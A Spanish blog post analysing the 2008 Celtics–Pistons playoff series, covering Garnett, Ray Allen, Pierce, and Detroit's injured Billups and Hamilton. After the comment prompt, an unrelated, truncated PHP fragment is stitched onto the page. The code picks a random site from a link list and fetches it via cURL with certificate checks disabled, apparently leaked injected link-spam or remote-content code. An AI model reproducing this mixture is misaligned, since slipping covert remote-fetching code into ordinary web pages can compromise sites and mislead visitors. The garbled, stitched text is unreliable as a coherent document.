ANÁLISIS CELTICS 4 – PISTONS 2

04 de June de 2008 por TheDeerHunter

Al final, y en contra de lo que algunos esperábamos, el resurgir de la máxima potencia de la liga se ha confirmado. Los movimientos por incorporar a dos futuros Hall-of-famers como Garnett y Ray Allen han terminado por dar sus frutos y el equipo más laureado de la historia vuelve al lugar que les corresponde tras 21 años de penurias. Otra vez más, contra el rival que le discute la hegemonía.

Vuelven, como no podía ser de otra manera, por la puerta grande, como sus “rivales esenciales”, dejando en la cuneta al mejor equipo del Este de los últimos años y recuperando el mejor nivel de juego que les ha llevado hasta este punto. Precísamente una de las cuestiones que había sobre la mesa, era la posibilidad de recuperar a Ray Allen, que llevaba haciendo una postemporada indigna de su calidad. No ha sido casualidad que lo hayan logrado pues en esa línea todo el equipo se había volcado, dándole toda la confianza del mundo y apoyándole hasta la extenuación, pues si hay algo que caracteriza a estos Celtics y que los une directamente con las leyendas verdes del pasado, es la solidaridad y la cohesión, como también la capacidad de sacrificio.

La otra clave al principio de la serie en cuanto a jugadores se refiere, era la recuperación física de Billups. Lamentáblemente para Detroit, no sólo no han podido contar con el mejor Billups, sino que también Hamilton ha comenzado a sufrir problemas en el momento más inoportuno y decisivo. La batalla en el juego exterior podría haber desequilibrado la balanza en favor de Pistons. A pesar del paso adelante que ha dado Rodney Stuckey y de los esfuerzos por luchar contra la adversidad de Billups&Hamilton, bastante han hecho con mantener la cara contra Allen, Rondo y, sobre todo, Pierce, que en esta ocasión se ha llegado a comer con patatas al bueno de Tayshaun Prince.

Ha sido en la zona donde se ha librado la verdadera guerra. Por fin “Big Ticket”, uno de los mejores jugadores de los últimos años y uno de los más castigados por los resultados, puede aspirar al anillo con todo el merecimiento del mundo. Ha estado soberbio, como de él se espera siempre. Nada de temblarle la mano en el peor momento como muchos le han acusado durante todos estos años. Es a Wallace a quien, no la mano sino la cabeza se le ha ido de vacaciones antes de tiempo y el equipo ha sufrido sus sinergías y descentres. Sin Rasheed, McDyess ha tratado de recuperar la juventud perdida haciendo alguna actuación sorprendente. Nada más que un espejismo. Muy meritorio lo suyo en estos playoffs pero ya no todos los días son domingo para el bueno de Antonio y no está la cosa para cargarse el equipo a sus espaldas. Un correcto Perkins para complementar a Garnett ha sido suficiente para que el duelo se lo hayan llevado de calle los Boston Celtics.

Al final, ni factores cancha, ni desgaste por haber jugado todos los partidos del playoff. Ha sido el hambre y la ansiedad por llegar a la final lo que se ha impuesto. Ambos son proyectos con corta esperanza de vida, pero el ahora o nunca de Boston les ha dado el plus de motivación que necesitaban a estas alturas de competición. Resulta curioso que transmitan menos cansancio que hace un par de semanas… lo que hace tener un título al alcance de la mano.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>